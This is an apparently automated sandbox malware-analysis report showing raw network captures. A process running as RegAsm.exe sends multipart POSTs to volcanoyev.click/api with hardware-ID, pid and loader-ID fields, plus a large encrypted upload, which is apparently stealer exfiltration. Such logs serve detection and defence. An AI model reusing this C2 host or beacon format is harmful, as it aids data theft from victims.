                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1846&min_rtt=1845&rtt_var=695&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15996&delivery_rate=1572428&cwnd=249&unsent_bytes=0&cid=db32a8edf2053717&ts=1117&x=0"
                                                          2024-12-24 01:18:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.849721172.67.195.2414434132C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:30 UTC282OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=ZT0EBBFSKA5FORKR2G
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 20244
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:30 UTC15331OUTData Raw: 2d 2d 5a 54 30 45 42 42 46 53 4b 41 35 46 4f 52 4b 52 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 54 30 45 42 42 46 53 4b 41 35 46 4f 52 4b 52 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 54 30 45 42 42 46 53 4b 41 35 46 4f 52 4b 52 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65
                                                          Data Ascii: --ZT0EBBFSKA5FORKR2GContent-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--ZT0EBBFSKA5FORKR2GContent-Disposition: form-data; name="pid"3--ZT0EBBFSKA5FORKR2GContent-Disposition: form-data; name="lid"VC6Dfm--Loade
                                                          2024-12-24 01:18:30 UTC4913OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a
                                                          Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:
                                                          2024-12-24 01:18:31 UTC1123INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=qnjhfu4e7074eu439ci8igh43g; expires=Fri, 18 Apr 2025 19:05:10 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xNpvClxSriKANnrWXoN5d2kls54HnaEgeFKzDKlH7A1Vujk9w3M2Jb3rYQpOUtMKVOgMYTXVELSWSJQlyEQLEHv0Bf9lGPtQQMPodpsaUOWz5zN44q2Q9%2FGjiZWv4uY%2B8WIg"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc2028a01c411-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1527&rtt_var=616&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21206&delivery_rate=1912246&cwnd=224&unsent_bytes=0&cid=8078052870417cb5&ts=973&x=0"
                                                          2024-12-24 01:18:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.849723172.67.195.2414434352C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:33 UTC283OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=XDCI16EBE26VJHTU8DL
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 12854
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:33 UTC12854OUTData Raw: 2d 2d 58 44 43 49 31 36 45 42 45 32 36 56 4a 48 54 55 38 44 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 44 43 49 31 36 45 42 45 32 36 56 4a 48 54 55 38 44 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 44 43 49 31 36 45 42 45 32 36 56 4a 48 54 55 38 44 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f
                                                          Data Ascii: --XDCI16EBE26VJHTU8DLContent-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--XDCI16EBE26VJHTU8DLContent-Disposition: form-data; name="pid"2--XDCI16EBE26VJHTU8DLContent-Disposition: form-data; name="lid"VC6Dfm--Lo
                                                          2024-12-24 01:18:34 UTC1129INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=imme555jqeni1c2mcbmf6l10r1; expires=Fri, 18 Apr 2025 19:05:12 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zZp%2FBuyHjoZSXKPCgUxB4QHT2WQadm6ci3MC94g0rVZV%2BeJqL4mE1fpscBtAYq%2B%2BbUHildR2HiS6%2F37aqyTjpI8m8t3hFmPmxDG7ByX0YD1j1TvhHCH9eXcqWssPsKsTMX2D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc2115dec0f5b-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1467&rtt_var=576&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13795&delivery_rate=1859872&cwnd=218&unsent_bytes=0&cid=3e3290c3f6727057&ts=1119&x=0"
                                                          2024-12-24 01:18:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.849722172.67.195.2414434132C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:33 UTC271OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=XEBG0L3P
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 1206
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:33 UTC1206OUTData Raw: 2d 2d 58 45 42 47 30 4c 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 45 42 47 30 4c 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 45 42 47 30 4c 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 0d 0a 2d 2d 58 45 42 47 30 4c 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                          Data Ascii: --XEBG0L3PContent-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--XEBG0L3PContent-Disposition: form-data; name="pid"1--XEBG0L3PContent-Disposition: form-data; name="lid"VC6Dfm--Loader2--XEBG0L3PContent-Dispos
                                                          2024-12-24 01:18:33 UTC1124INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=hthnorj38o8evgo9vmkghtcs2v; expires=Fri, 18 Apr 2025 19:05:12 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yaZPJdofbVhZ1K1ptNKERmpoebXyeomAauusB24FOpzzg9bTvq0pjwZl%2FXB1ZYGQ3E%2BC2Y%2F8blzIWIdQeioZiwEQMFdQjGQhl0yT3GLUw6khQsmnhglUMYyh2Mfb9p%2BoWKe5"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc21199727279-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1768&rtt_var=675&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2113&delivery_rate=1606160&cwnd=220&unsent_bytes=0&cid=c42a8fc7e04ee19c&ts=833&x=0"
                                                          2024-12-24 01:18:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.849724172.67.195.2414434132C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:35 UTC284OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=B2IOVM6I5P62J56QYWC
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 589130
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: 2d 2d 42 32 49 4f 56 4d 36 49 35 50 36 32 4a 35 36 51 59 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 32 49 4f 56 4d 36 49 35 50 36 32 4a 35 36 51 59 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 32 49 4f 56 4d 36 49 35 50 36 32 4a 35 36 51 59 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f
                                                          Data Ascii: --B2IOVM6I5P62J56QYWCContent-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--B2IOVM6I5P62J56QYWCContent-Disposition: form-data; name="pid"1--B2IOVM6I5P62J56QYWCContent-Disposition: form-data; name="lid"VC6Dfm--Lo
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: 97 31 fb f6 2d 73 66 c0 8b f9 ce 43 e8 a8 73 8d 46 a0 ad 4d 39 83 aa 35 25 e9 54 76 30 0d a8 28 f2 08 8a c9 4d 2f 2f 49 b7 22 a9 9e b5 88 60 ef 4e 2f 36 3e 7c a8 88 72 7f ef ee db 17 49 97 6b 4f d0 92 61 fe 62 81 2e a5 7f bd 5f 9c a5 98 06 aa ff f6 50 68 18 72 3e b6 d8 39 e2 fa 34 da 37 d1 9d 1e be ae 5d d2 c1 5a 8c 07 ba 19 a3 b9 cb 1c 02 0e 5a 21 a0 5c 05 29 51 26 fa ee 43 8f 3c f4 5a 4a bb 6b cd f0 99 28 b2 7d 57 ce 92 03 8a 3c 8f ea 8e 57 a6 39 8a f6 25 69 f1 b8 16 9a 8c 58 14 c7 b3 be 4e 8f 8b 7b e4 28 69 c5 06 c0 be 3e a8 c6 0d b3 6c bc ea 40 7e 6a aa 1a 67 e5 c2 70 38 e6 2e f7 ae 9e d3 69 7e 28 ee fe 79 73 77 d4 ad a4 56 49 74 2f 41 65 28 12 a9 ca 5c 83 55 37 0b 40 f2 ff be f0 80 f1 cd 4c 4c 9d 6f 27 6f 17 23 cb 30 08 ca ae e4 0c 0d dc 65 34 55 64
                                                          Data Ascii: 1-sfCsFM95%Tv0(M//I"`N/6>|rIkOab._Phr>947]ZZ!\)Q&C<ZJk(}W<W9%iXN{(i>l@~jgp8.i~(yswVIt/Ae(\U7@LLo'o#0e4Ud
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: b3 ca 72 be 20 fe 6e b1 bb 7d 23 ce 55 0b 52 65 09 34 aa 4a 47 79 72 5f d4 a4 14 60 b5 8e 87 8c dd 38 35 0d a1 c0 51 46 7e 11 06 ce 91 6e 36 d1 4b 62 7f 1b 6b 4d 53 6e c8 52 5a 26 f1 be 90 42 72 aa ea f5 20 3e 6f fd 07 c6 fa f3 28 44 2b fb 5c cf 90 35 b6 e7 16 ea 9f 69 29 1b c9 8f d3 30 d1 aa c0 7c 1d 6f 96 13 80 b1 c3 e7 78 61 7b ab a8 92 bf 90 fe 7a c6 50 d6 fd a5 ec eb 65 a4 84 2e cb 0d 45 70 ff d9 3c 52 ba 01 66 01 e4 7b aa 55 0e 42 12 a0 79 dc fb 25 27 dd 0f 9d c6 c7 35 88 83 79 c5 d5 f8 1e 11 c2 57 41 71 bb 78 9e a9 d5 49 52 3a 20 63 63 11 7d 5e 43 1a 59 c0 f6 f5 fb 84 c5 bd a7 ba 59 ed c3 e8 ae 3b e2 de dc db f4 6d 57 88 90 2c 02 1e 06 86 1f b3 c1 34 ba 51 60 a3 78 7e a3 da c2 0e c3 46 7d 25 cc 98 ce 09 ad 78 7d 85 db cb a3 93 c9 ba 23 81 0f 06 03
                                                          Data Ascii: r n}#URe4JGyr_`85QF~n6KbkMSnRZ&Br >o(D+\5i)0|oxa{zPe.Ep<Rf{UBy%'5yWAqxIR: cc}^CYY;mW,4Q`x~F}%x}#
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: 03 68 51 e2 bc 20 0a 01 15 75 6d 84 b4 ee 28 ab 89 57 55 35 82 a4 89 26 ae b7 bb 7a af b8 5a a7 3d ca cc 5b f5 9a 1a 18 3e 5f fa 0c ae a2 9b 07 66 8d 93 39 c6 de 02 c9 23 b6 d5 0b a7 62 d8 fb 77 42 c3 f6 70 55 61 21 2e 0a 8a 19 8f 74 81 4b 3b 1c b0 93 2f 78 7d 8f 66 7e 21 35 fe d6 06 44 18 db 5d 12 bc c1 4c 0e 06 1c 48 38 a1 fb 47 e8 9f d1 35 df 09 10 c7 71 7a e5 0b 44 01 5c f7 fd 09 45 18 18 f9 6c 0a 88 bd 3e a6 a7 83 be c0 c8 b1 67 26 02 d6 96 b2 82 4b f7 8f fe 13 52 0c ec cf 4f 17 0f 66 1d c9 52 e8 d6 00 c7 1f 36 af 04 94 ad ca 67 95 1d 21 0e d4 ce 2c 4d 7c d1 07 58 4a 3d f7 05 4f b3 6b 8d f9 18 ab 71 a9 f1 77 59 7b 4a c3 8b 7c cb eb 10 28 a5 95 c8 9f e6 64 a2 a9 63 a3 a1 ef 55 12 4e 37 37 91 18 5d c1 1f 61 c4 da 00 a7 c4 15 87 36 45 76 2c 8c 3a 82 0c
                                                          Data Ascii: hQ um(WU5&zZ=[>_f9#bwBpUa!.tK;/x}f~!5D]LH8G5qzD\El>g&KROfR6g!,M|XJ=OkqwY{J|(dcUN77]a6Ev,:
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: 47 72 f7 e1 52 51 b1 4a ae 4b 97 81 39 b0 c0 b9 4d 54 1c 42 45 16 e3 8e 87 2b ba 34 df 8f 5f a2 b6 e3 0c 2f 80 ef 4b 59 84 8e ba e3 f4 4b ad e1 81 76 68 cc db 2f fd b6 c3 24 7f e3 8c 36 de 54 59 d0 a7 74 34 f5 14 d0 28 cd 52 00 05 99 2f 42 23 51 2f d3 72 58 4c af aa 6c dc db 37 10 56 86 1d 5c e2 a9 9c 88 74 9b 6f 6b e6 ef dd b8 11 3c e1 ba 4b b2 ef 98 41 81 d9 01 dc 6b 05 02 ee 1d b6 c3 44 17 01 60 2d db bc c0 ec 8f 42 24 9c 9c 46 ad f5 04 b4 0b 88 88 1b 19 5e 7d 2b 34 2b 40 b4 4d 2a b0 06 05 f6 ae 44 a5 8c ab 64 aa 21 ae 4f 05 e4 1e 91 29 d8 05 ec 4e a4 11 4c e1 54 13 32 21 bb 17 e3 55 f3 83 b0 da 1d a7 48 14 17 e4 e3 bb 84 22 0f 47 50 9d a6 b8 26 3f c9 d2 e2 b5 c4 7d a1 65 06 18 5d ff 5b 6f 8e 60 ed b8 75 fc 26 97 41 4a 96 c9 4f f0 16 83 e0 05 7e 3c c4
                                                          Data Ascii: GrRQJK9MTBE+4_/KYKvh/$6TYt4(R/B#Q/rXLl7V\tok<KAkD`-B$F^}+4+@M*Dd!O)NLT2!UH"GP&?}e][o`u&AJO~<
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: 6f 30 1a 1b 83 e4 7a 6f ac e9 ce bb 49 45 e8 3a b7 d4 1a 7a e1 56 4f d1 50 04 5f f9 3c 93 d8 18 2d 13 cf 13 a6 d3 29 35 27 f7 fb 4e f6 2a 16 bf 2a 12 9c f2 41 73 8d 71 7d 2b 09 e0 ed 8d f7 dd a7 95 bb 5b 4e 05 a7 00 90 20 2b 33 76 71 36 ad 18 df 17 94 ed 6a 35 c6 73 48 ab c9 2f 80 a5 c4 27 f3 70 5f 81 16 e7 a6 4e 32 ca c0 0b 94 6e 37 ba ce 9e 3b c3 6c 58 3b 68 e7 79 d7 18 bf 39 fe be e8 43 75 27 e4 8e 68 1e f4 f0 56 74 7b e2 7d 32 9d 84 9f cf 5f 1d ae a8 74 6d 35 39 16 4e 1d f7 5b d9 fc fb f8 c1 b8 0a d9 0c 0e b8 cf 60 a6 d7 a7 af 67 56 d8 69 80 a5 47 bc 20 7f b0 5b 5b 7d ad 96 bf 4b 77 7e ad f9 95 a0 79 e8 60 cf 64 33 35 60 f3 37 1b 4d cf 1f d4 c4 42 8c c4 8b cc 20 f3 ed bd 85 f7 f2 87 36 2a c6 a3 b5 a9 c2 55 6b cc e4 54 5e 02 98 af 32 57 8b 1f 1c f2 7f
                                                          Data Ascii: o0zoIE:zVOP_<-)5'N**Asq}+[N +3vq6j5sH/'p_N2n7;lX;hy9Cu'hVt{}2_tm59N[`gViG [[}Kw~y`d35`7MB 6*UkT^2W
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: 41 e8 1c 88 c2 44 b6 76 ff 34 dc 76 3a f6 58 15 fc 15 96 b1 47 22 9a 7d e5 2b 59 ae 8f 56 7f c4 d0 c0 3b 64 af fc f4 8f be c9 c3 28 d8 85 69 fe b8 04 cc 59 6e 37 08 75 3a 2b 4b 44 bc e9 82 ed e6 3d ed 00 8c 1a 57 4f 08 80 d4 e8 f9 bb 1a d2 40 4c 17 98 82 d6 72 e0 21 6e 34 fc 88 5e bd b7 ef 22 5d 0c 04 a2 38 fd 61 74 14 90 b8 83 1b fb c1 b3 ec 07 61 d9 bf 20 86 08 fb 59 7c fe fe 85 a4 f1 ed 23 64 10 bd 32 3b 1f 0b 97 cb dd 40 d9 01 77 d9 30 31 60 97 9d 55 d0 da 8c bf 14 19 5f 8e f5 3a f9 b4 cd 51 7f ce 72 a4 3a e6 e6 24 4f 87 24 2c 25 b4 47 e4 4f 6f 0a 53 83 b0 59 b2 dd a6 33 43 4e 14 15 09 87 7b a2 cf 03 3c c4 3e 2d 85 e5 22 18 00 da d0 61 54 ee 41 8a e8 ab 6a 3f cb 88 5d 23 5c 1d 4f 9c 63 c3 31 d1 3c 02 77 ff 7c 37 fa a3 db 8c fd c3 47 ee 9b f6 48 45 22
                                                          Data Ascii: ADv4v:XG"}+YV;d(iYn7u:+KD=WO@Lr!n4^"]8ata Y|#d2;@w01`U_:Qr:$O$,%GOoSY3CN{<>-"aTAj?]#\Oc1<w|7GHE"
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: 66 38 3f c3 a3 4a ce c6 fc a8 05 51 a6 5d e5 53 1e 9f 2e a1 6d bc 6f a8 fb 44 73 9e 29 2f 9d de 25 4c 66 38 44 06 a3 36 c1 c6 b5 a5 ce 8d 57 ef b9 b7 56 c6 c1 b4 28 b0 bb b0 bd 53 19 f1 07 ff 43 c3 67 f3 01 c1 27 9f 0f bc df 83 46 dc 13 90 32 09 0a 64 f1 d3 dc 20 ed 42 0c f5 15 04 57 ca a9 81 ee 84 33 a0 20 b5 57 13 0a 3a a4 58 20 0a fe c8 f5 c9 9d f4 71 1f 76 de 0f 1a 37 b7 fb a7 f5 e2 53 ce f0 cc bf b3 9b 59 80 ad 2e d2 df e3 b9 b0 d3 57 97 6d 32 9d 79 50 bd d9 ea 35 e9 a2 b2 51 20 9c 10 29 9b 1a 79 8f 6b 47 c7 d1 4f ce fb 26 25 f8 f2 0c 79 57 fc df 12 11 8f 9f 7e b6 f8 a9 00 f9 49 64 2b ff 31 e2 31 70 0c 51 89 4e 7f 33 42 79 7f d0 0e ee 94 61 c8 ce ee 40 5d 3b 1d 8f 22 f1 68 a0 2e 88 d4 8e 59 fb a1 cf cd 00 a2 8b 3c 42 39 d7 74 d4 08 5d 31 70 29 f9 f5
                                                          Data Ascii: f8?JQ]S.moDs)/%Lf8D6WV(SCg'F2d BW3 W:X qv7SY.Wm2yP5Q )ykGO&%yW~Id+11pQN3Bya@];"h.Y<B9t]1p)
                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: ac 61 81 58 17 61 a5 09 c4 78 ae 77 63 14 cb b5 a3 4b e3 d1 0a 52 8b bf dc c0 56 fb 69 98 d4 3e b8 14 6e 58 28 e0 71 6f 21 16 30 b1 43 df 5e 94 29 6b 24 5e 5f 2d a0 24 c0 54 6b a3 13 61 3a 7d 68 45 8d 01 68 19 77 68 02 a0 d9 49 6e 6c 5d fe ee bd ee d0 a4 e5 f1 b8 fc 1c bb 94 2b 9f 8b 97 05 43 5a 27 47 c3 4f 2e 3c 7e b7 1b 51 d6 52 7f 69 f4 f3 ad 56 c1 97 a8 cb 05 37 17 56 17 c9 44 e4 c2 ff 1e b5 2c 43 2e 3a f7 6d 31 9a e5 8e 8c 7d 27 7c be fc 39 9b a7 f5 66 34 27 e1 3b 7b 63 34 91 b6 a2 c8 d8 c1 52 f0 20 0e 8f 4d ce 52 82 3f a8 30 d8 bf b8 71 e8 b4 28 38 55 4d cc 3c 73 cf 84 e7 29 c7 fa a1 29 2f 38 99 7a 30 2f 87 6f a1 6d d1 cd 91 fa 66 ab 24 7a 7e f5 15 81 37 59 fc c6 b7 eb 30 33 5a dd 63 cf ab 91 f7 55 b6 88 ec c3 76 1a dc 5f d6 61 54 55 f0 41 a7 4b 0f
                                                          Data Ascii: aXaxwcKRVi>nX(qo!0C^)k$^_-$Tka:}hEhwhInl]+CZ'GO.<~QRiV7VD,C.:m1}'|9f4';{c4R MR?0q(8UM<s))/8z0/omf$z~7Y03ZcUv_aTUAK
